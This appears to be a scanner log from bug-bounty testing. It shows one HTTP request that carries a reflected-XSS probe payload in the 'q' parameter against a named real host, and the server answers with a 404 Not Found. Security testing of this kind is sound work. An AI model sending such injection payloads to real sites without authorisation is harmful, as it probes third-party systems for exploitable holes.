[khodrochi-cms-xss] Dumped HTTP request for https://techsolutions.bitpanda.com/specification/report.php?q=%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain)%3E


GET /specification/report.php?q=%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain)%3E HTTP/1.1
Host: techsolutions.bitpanda.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Connection: close
Accept: */*
Accept-Language: en
X-Bug-Bounty: Bugcrowd-eno@bugcrowdninja.com
Accept-Encoding: gzip


[khodrochi-cms-xss] Dumped HTTP response https://techsolutions.bitpanda.com/specification/report.php?q=%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain)%3E

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 9
Cache-Control: max-age=30
Content-Type: text/plain
Date: Tue, 05 Aug 2025 12:53:24 GMT
Strict-Transport-Security: max-age=31536000
Via: 1.1 5b0b018dc5d72a42f205b24b17f4f56e.cloudfront.net (CloudFront)
X-Amz-Cf-Id: hGcmRinyw6im_Sjv_jRaZ9UPDZ6zjYDct_QB-rnDUjRPK5F9co46wA==
X-Amz-Cf-Pop: IAD55-P8
X-Amz-Id-2: El6R92m0Wv3CtZR0iGIZW2ZIoPX8NgY2OPm86qPcwSwp0KDUCnQuZdWDaIcwNeDYukxNbY2TwVk=
X-Amz-Request-Id: 74N6ZTADDS7EY8E5
X-Cache: Error from cloudfront

Not Found
